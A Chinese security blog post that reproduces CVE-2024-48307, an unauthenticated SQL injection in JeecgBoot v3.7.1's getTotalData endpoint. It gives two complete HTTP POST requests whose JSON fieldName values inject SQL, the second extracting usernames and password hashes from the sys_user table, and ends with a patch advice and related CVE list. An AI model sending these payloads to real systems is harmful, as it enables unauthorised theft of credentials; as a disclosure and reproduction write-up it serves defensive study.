关注我们❤️,添加星标🌟,一起学安全! 作者:hexixi@Timeline Sec 本文字数:2248 阅读时长:2~4mins 声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x/3.x,SpringCloud,Ant Design&Vue3,Mybatis-plus,Shiro,JWT,支持微服务。具有代码生成器、权限管理、工作流引擎、监控报警、数据大屏等功能,可以帮助开发人员快速搭建企业级应用系统。
漏洞编号:CVE-2024-48307
JeecgBoot v3.7.1中的/onlDragDatasetHead/getTotalData组件发现存在SQL注入漏洞。攻击者可以无需权限利用jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar查询数据库,导致数据库信息泄露。
jimureport-spring-boot-starter.version<=1.8.1
https://github.com/jeecgboot/JeecgBoot/releases
idea部署后端
进入jeecgboot-vue3目录下执行pnpm dev命令开启前端
访问http://IP:8080/jeecg-boot/drag/onlDragDatasetHead/getTotalData可以发现服务可用,不能以get方式访问
根据源码构建json数据,尝试访问sys_user表的id
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 296
Content-Type: application/json
{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(id)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "string"}], "type": []}}
查询username和password
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 311
{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(username,0x3a,password)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "1"}], "type": []}}
更新插件jimureport到最新版本。
https://help.jeecg.com/setup/startup.html
CNVD-2023-69437 CVE-2023-6307 CVE-2023-4450 CVE-2023-42268 CVE-2023-41578 CVE-2023-41544 CVE-2023-41543 CVE-2023-41542 CVE-2023-40989 CVE-2023-38992 CVE-2023-34659 CVE-2023-34603 CVE-2023-34602 CVE-2023-24789 CVE-2023-1784 CVE-2023-1741 CVE-2023-1454
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!